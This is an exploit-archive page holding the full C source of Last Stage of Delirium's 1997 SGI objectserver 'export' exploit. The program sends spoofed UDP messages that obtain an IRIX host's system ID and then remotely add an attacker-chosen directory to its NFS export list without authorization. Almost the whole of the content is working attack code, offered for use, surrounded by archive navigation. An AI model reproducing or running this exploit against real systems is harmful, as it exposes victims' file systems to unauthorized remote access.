objectserver2.c

objectserver2.c: Posted Sep 7, 2000; Site lsd-pl.net; SGI objectserver "export" exploit - Remotely adds new entry to the export list on the IRIX system. See our SGI objectserver "account" exploit for more information. Only directories that aren't supersets of already exported ones can be added to the export list.; tags | exploit; systems | irix; SHA-256 | 4b12bc670104362647c98bc09c33e31bd72cf0907624f171bded34b49558ac77; Download | Favorite | View

objectserver2.c

/*## copyright LAST STAGE OF DELIRIUM jul 1997 poland        *://lsd-pl.net/ #*/
/*## objectserver                                                            #*/

/*   SGI objectserver "export" exploit                                        */
/*   Remotely adds new entry to the export list on the IRIX system.           */
/*   See our SGI objectserver "account" exploit for more information.         */
/*   Only directories that aren't supersets of already exported ones          */
/*   can be added to the export list.                                         */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/uio.h>
#include <errno.h>
#include <stdio.h>
#define E if(errno) perror("");

struct iovec iov[2];
struct msghdr msg;
char buf1[1024],buf2[1024];
int sck;
unsigned long adr;

void show_msg(){
    char *p,*p1;
    int i,j,c,d;

    c=0;
    printf("%04x   ",iov[0].iov_len);
    p=(char*)iov[0].iov_base;
    for(i=0;i<iov[0].iov_len;i++){
        c++;
        if(c==17){
             printf("    ");
             p1=p;p1=p1-16;
             for(j=0;j<16;j++){
                 if(isprint(*p1)) printf("%c",*p1);
                 else printf(".");
                 p1++;
             }
             c=1;
             printf("\n       ");
        }
        printf("%02x ",(unsigned char)*p++);
    }
    printf("    ");
    p1=p;p1=p1-c;
    if(c>1){
        for(i=0;i<(16-c);i++) printf("   ");
        for(i=0;i<c;i++){
            if(isprint(*p1)) printf("%c",*p1);
            else printf(".");
            p1++;
        }
    }
    printf("\n");
    if(msg.msg_iovlen!=2) return;

    c=0;
    p=(char*)iov[0].iov_base;
    d=p[0x0a]*0x100+p[0x0b];
    p=(char*)iov[1].iov_base;
    printf("%04x   ",d);
    for(i=0;i<d;i++){
        c++;
        if(c==17){
             printf("    ");
             p1=p;p1=p1-16;
             for(j=0;j<16;j++){
                 if(isprint(*p1)) printf("%c",*p1);
                 else printf(".");
                 p1++;
             }
             c=1;
             printf("\n       ");
        }
        printf("%02x ",(unsigned char)*p++);
    }
    printf("    ");
    p1=p;p1=p1-c;
    if(c>1){
        for(i=0;i<(16-c);i++) printf("   ");
        for(i=0;i<c;i++){
            if(isprint(*p1)) printf("%c",*p1);
            else printf(".");
            p1++;
        }
    }
    printf("\n");
    fflush(stdout);
}

char numer_one[0x10]={
    0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
    0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x00
};

char numer_two[0x24]={
    0x21,0x03,0x00,0x43,0x00,0x0a,0x00,0x0a,
    0x01,0x01,0x3b,0x01,0x6e,0x00,0x00,0x80,
    0x43,0x01,0x01,0x18,0x0b,0x01,0x01,0x3b,
    0x01,0x6e,0x01,0x02,0x01,0x03,0x00,0x01,
    0x01,0x07,0x01,0x01
};

char dodaj_one[0x10]={
    0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,
    0x00,0x00,0x01,0x2a,0x00,0x00,0x00,0x00
};

char dodaj_two[1024]={
    0x1c,0x03,0x00,0x43,0x01,0x04,0x0a,0x01,
    0x01,0x3b,0x01,0x78
};

char dodaj_three[27]={
    0x01,0x02,0x0a,0x01,0x01,0x3b,0x01,
    0xd2,0x00,0x00,0x80,0x43,0x01,0x04,0x17,
    0x0b,0x01,0x01,0x3b,0x01,0x02,0x01,0x01,
    0x01,0x09,0x43,0x01
};

char dodaj_four[47]={
    0x17,0x0b,0x01,0x01,0x3b,0x01,0xd2,
    0x01,0x04,0x01,0x09,0x43,0x01,0x04,0x72,
    0x6f,0x6f,0x74,0x17,0x0b,0x01,0x01,0x3b,
    0x01,0xd2,0x01,0x08,0x01,0x07,0x01,0x01,
    0x17,0x0b,0x01,0x01,0x3b,0x01,0x01,0x01,
    0x01,0x01,0x0f,0x02,0xff,0xff,0xff,0xff
};

char fake_adrs[0x10]={
    0x00,0x02,0x14,0x0f,0xff,0xff,0xff,0xff,
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

char *get_sysinfo(){
    int i=0,j,len;

    iov[0].iov_base=numer_one;
    iov[0].iov_len=0x10;
    iov[1].iov_base=numer_two;
    iov[1].iov_len=0x24;
    msg.msg_name=(caddr_t)fake_adrs;
    msg.msg_namelen=0x10;
    msg.msg_iov=iov;
    msg.msg_iovlen=2;
    msg.msg_accrights=(caddr_t)0;
    msg.msg_accrightslen=0;
    printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
    printf("\n");

    iov[0].iov_base=buf1;
    iov[1].iov_base=buf2;
    iov[1].iov_len=0x200;
    msg.msg_iovlen=2;
    printf("RM:  --[0x%04x bytes]--\n",len=recvmsg(sck,&msg,0)); show_msg();
    printf("\n");
    while(i<len-0x16)
        if(!memcmp("\x0a\x01\x01\x3b\x01\x78",&buf2[i],6)){
            printf("remote system ID: ");
            for(j=0;j<buf2[i+6];j++) printf("%02x ",(unsigned char)buf2[i+7+j]);
            printf("\n");
            return(&buf2[i+6]);
        }else i++;
    return(0);
}

void new_export(int len){
    iov[0].iov_base=dodaj_one;
    iov[0].iov_len=0x10;
    iov[1].iov_base=dodaj_two;
    iov[1].iov_len=len;
    msg.msg_name=(caddr_t)fake_adrs;
    msg.msg_namelen=0x10;
    msg.msg_iov=iov;
    msg.msg_iovlen=2;
    msg.msg_accrights=(caddr_t)0;
    msg.msg_accrightslen=0;
    printf("SM:  --[0x%04x bytes]--\n",sendmsg(sck,&msg,0)); show_msg();
    printf("\n");

    iov[0].iov_base=buf1;
    iov[1].iov_base=buf2;
    iov[1].iov_len=0x200;
    msg.msg_iovlen=2;
    printf("RM:  --[0x%04x bytes]--\n",recvmsg(sck,&msg,0)); show_msg();
    printf("\n");
}

void info(char *text) {
    printf("usage: %s address directory\n",text);
}

main(int argc,char **argv){
    int probe=0;
    unsigned int offset;
    char *sys_info;

    printf("copyright LAST STAGE OF DELIRIUM jul 1997 poland  //lsd-pl.net/\n");
    printf("objectserver for irix 5.2 5.3 6.2\n\n");

    if(argc<2) {info(argv[0]);exit(0);}
    else if(argc==2) probe=1;
    offset=39;
    adr=inet_addr(argv[1]);

    sck=socket(AF_INET,SOCK_DGRAM,0);
    memcpy(&fake_adrs[4],&adr,4);
    memcpy(&dodaj_four[43],&adr,4);

    if(!(sys_info=get_sysinfo())){
        printf("error: can't get system ID for %s.\n",argv[1]);
        exit(1);
    }
    if(!probe){
        memcpy(&dodaj_two[0x0c],sys_info,sys_info[0]+1);
        memcpy(&dodaj_two[0x0c+sys_info[0]+1],&dodaj_three[0],27);

        offset+=sys_info[0]+1;
        dodaj_two[offset++]=strlen(argv[2]);

        memcpy(&dodaj_two[offset],argv[2],strlen(argv[2])); 
        offset+=strlen(argv[2]); 
        memcpy(&dodaj_two[offset],&dodaj_four[0],47);
        offset+=47;
        dodaj_one[10]=offset>>8;
        dodaj_one[11]=offset&0xff;
        new_export(offset);
    }else printf("error: no directory specified.\n"); 
}
/*                    www.hack.co.za           [12 August 2000]*/

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

objectserver2.c

objectserver2.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

objectserver2.c

Share This

objectserver2.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems